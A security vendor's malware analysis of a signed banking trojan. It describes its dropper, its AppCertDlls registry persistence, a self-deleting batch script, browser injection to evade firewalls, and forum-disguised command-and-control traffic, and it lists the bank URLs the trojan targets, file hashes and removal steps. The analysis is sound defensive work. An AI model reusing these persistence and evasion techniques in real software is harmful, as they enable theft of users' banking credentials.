Learn about Zero Trust Architecture
Impenetrable cybersecurity without sacrificing usability
Gain detailed visibility into all your endpoints activities
Harden applications and hardware environments
Immediate and continuous response to incidents
Close the window of time your data could be exposed
Get your Comodo solutions setup, deployed or optimized
Control access to malicious websites
Defend from any internet based threats
Stop email threats before it enters your inbox
Preserve and protect your sensitive data
Keep your website running fast and malware free
Add encryption to your websites
Automated certificate mgmt. platform
Secure private intranet environments
Digital signature solutions for cloud apps
Encrypt emails for senders and recipients
Stay compliant with PCI DSS
Trusted authentication for IoT devices
Francisco Partners a leading technology-focused private equity fund, has acquired a majority stake in Comodo’s certificate authority business. Newly renamed from Comodo CA Limited to Sectigo Limited. Privacy Policies, Trademarks, Patents and Terms & Conditions are available on Sectigo Limited’s web site.
Meet the people behind the direction for Comodo
Get the latest news about Comodo
People are the key to achievement and prosperity
Stay up to date with our on-demand webinars
Worldwide: Sales, Support and General Inquiries
Schedule a live demonstration of our solutions
Need immediate help? Call 1-888-551-1531
Instantly removes viruses to keep your PC virus free
Experience true mobile security on your mobile apple devices
Secure Internet Browser based on Chrome
Chrome browser internet security extension
Submit a ticket to our support team
Share any product bugs or security flaws
Collaborate with research experts on data sets
Valkyrie Threat Intelligence Plugins
Valkyrie Threat Intelligence APIs
As part of Comodo Labs’ ongoing analysis of “Digital Signature” (confirming software author and guaranteeing computer program code hasn’t been altered or corrupted since being signed) ”malware” (software used or created to disrupt computer operation, gather sensitive information, or gain access to computer systems), we recently discovered a new sample which uses an interesting and potentially devastating combination of techniques to deliver its “payload” (cargo of a data transmission).
Starting with a digitally signed “dropper” (installation program), the malware was able to successfully inject itself into Windows “processes” (instances of computer programs being executed); bypass “firewall” (protects against threats from the public Internet) and “host intrusion protection mechanisms” (monitor a single computer for suspicious activity by analyzing events occurring within that computer); send user details to a control “server” (computer hardware dedicated to run one or more services); download additional “configuration files” (configure initial settings for some computer programs) and finally to direct its victims to “phishing” websites (designed to look like other websites in an attempt to steal users’ personal information) which request the user’s banking usernames/passwords. This document contains a detailed description of our observations.
The dropper (installer) component of the malware was digitally signed by a trusted Certificate Authority. Because the installer was ‘trusted’, it was then able to evade detection by the heuristic and Host Intrusion Protection Systems (HIPSs) of many popular best antivirus and Internet Security programs.
Upon execution, the dropper first determines the architecture of the Windows operating system (32-bit or 64-bit) then extracts the appropriate main module from “PE” (Portable Executable) file resources.
The file name of this main module is generated by concatenating two named fragments from two random “*.exe” (Windows Executable) files in the Windows system folder. For example “diskpart.exe” (Windows text-mode command interpreter) and “eventvwr.exe” (Microsoft Event Viewer) generates the file name “disktvwr.dll”.
The main module is the PE “DLL” (Dynamic Link Library of functions and other information that can be accessed by a Windows program) which is placed in the Windows system folder under this generated name. It is then injected into the operating system process “explorer.exe” (Windows Explorer).
It is configured for automatic injection into most operating system processes and user applications via a randomly named value of an obscure Windows Registry key (similar to a folder):
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls] "ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"
As a result, the function “CreateProcessNotify”, exported by the malware “module” (portion of the program that carries out a specific function and may be used alone or combined with other modules of the same program), is requested at the creation of each new process. This causes the malware DLL to be injected in most operating system processes and user applications.
After this operation, the dropper removes itself via the execution of a simple “DOS” (Disk Operating System) “BAT” (batch) script file:
1342562.bat: attrib -s -r -h%1 :hkiflg del %1 if exist %1 goto hkiflg del %0
The main module is injected into the “explorer.exe” process and acts as a server application. It opens a “pipe” (named temporary software connection between two programs or commands) as a 128-bit Unique ID (UID), for example “\\\\.\\pipe\\{b2459e76-035d-2d18-0a97-debbcce1c0a5}”, and waits for incoming messages. Modules injected into other system processes and user applications act as “clients” (applications or systems that access a service made available by a server) and communicate with the server via the named pipe.
Modules injected into “iexplore.exe” (Microsoft Internet Explorer) and “firefox.exe” (Mozilla Firefox) web browser applications are used for communication with the remote control server. This tricks any firewall and HIPS technology by making network activity generated by the malware appear to have been initiated by the user. The current version of the malware does not support other browsers like “chrome.exe” (Google Chrome), “opera.exe” (Opera), and “safari.exe” (Apple Safari). To circumnavigate this issue, it prevents these browsers from opening and forces the user to use one of the supported browsers instead. The malware communicates with its remote control server by imitating access to a forum topic. Initially it sends an “HTTP” (Hypertext Transfer Protocol) “POST” (request method to request that the web server accepts the data enclosed in the request message’s body) for storage using a “URL” (Uniform Resource Locator global address of a web page on the World Wide Web) of following format:
http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c
…with the request body containing basic information about the user’s system and the installed malware module:
“user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475& win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin”
It will then receive an updated configuration file from the remote server. The malware stores the configuration and version information in a Windows Registry key named using a 128-bit UID in a similar way that has been used for the named pipe:
[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}] "k1"=dword:b12564d0 "k2"=dword:473d87bb "Version"=dword:0000002a "Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\ ...
The primary purpose of this malware is to steal personal information such as bank information or credit card accounts. This is a list of URLs monitored by the malware according to a recent configuration file:
bankofamerica.com/accounts-overview/accounts-overview.go bankofamerica.com/login/sign-in/signOnScreen.go bankofamerica.com/login/sign-in/validatePassword.go bankofamerica.com/myaccounts/ barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp billmelater.com/login/challenge.xhtml billmelater.com/your-account/home.xhtml bofa.com chaseonline.chase.com/gw/secure/ena chaseonline.chase.com/MyAccounts.aspx chaseonline.chase.com/secure/Profile/UpdateContactInfo/UpdateContact.aspx client.schwab.com/Accounts/ client.schwab.com/Accounts/Summary/Summary.aspx client.schwab.com/Service/MyProfile/MailingAddress.aspx consumercenter.gogecapital.com/consumercenter/homeaction.do discovercard.com/cardmembersvcs/achome/homepage mbwebexpress.blilk.com/Core/Authentication/MFAPassword.aspx mfasa.chase.com/auth/auth-stoken-osl.html online.americanexpress.com/myca/acctmgmt/ online.citibank.com online.wellsfargo.com/das/cgi-bin/session.cgi onlinebanking.pnc.com/ onlinebanking.tdbank.com/login.asp paypal.com/us/cgi-bin/webscr?cmd=_account paypal.com/us/cgi-bin/webscr?cmd=_login-done safe.bankofamerica.com/myaccounts/accounts-overview/accounts-overview.go safe.bankofamerica.com/myaccounts/brain/redirect.go safe.bankofamerica.com/myaccounts/signin/signIn.go?isSecureMobil servicing.capitalone.com/C1/Accounts/Summary.aspx shop.aafes.com/shop/Login.aspx shopmyexchange.com sitekey.bankofamerica.com/sas/signon.do sitekey.bankofamerica.com/sas/signonSetup.do sitekey.bankofamerica.com/sas/verifyImage.do ss2.experian.com/securecontrol/reset/ssphome suntrust.com/portal/server.pt us.etrade.com/e/t/accounts/accountsCombo us.hsbc.com/1/2/!ut/ wwws.ameritrade.com/cgi-bin/apps/SecurityChallenge
Once a user accesses one of the monitored URLs, the malware generates a phishing page which asks the user to enter their account details (including user-name, password and credit card number) under the pretense of either recovering their account password or to enable additional security measures:
File information:
Dropper EXE: Size: 285264 SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632 Signature: TrojWare.Win32.TrojanSpy.Volisk.a x86 DLL: Size: 88576 SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e Signature: TrojWare.Win32.TrojanSpy.Volisk.a x64 DLL: Size: 98304 SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f Signature: TrojWare.Win32.TrojanSpy.Volisk.a
Diagnosis, Removal & Protection Instructions
If your computer doesn’t have an Antivirus or Internet Security program installed and you believe it may have been infected by “malware” (malicious software):
1. Download Comodo Antivirus and perform a full scan with up-to-date antivirus database.2. Remove Malware Found by choosing from recommended options and stay protected.
Sign up to our cyber security newsletter
Comodo Cybersecurity would like to keep in touch with you about cybersecurity issues, as well as products and services available. Please sign up to receive occasional communications. As a cybersecurity company, we take your privacy and security very seriously and have strong safeguards in place to protect your information.
agreecheck
See how your organization scores against cybersecurity threats
Advanced Endpoint Protection, Endpoint Detection and Response Built On Zero Trust Architecture available on our SaaS EPP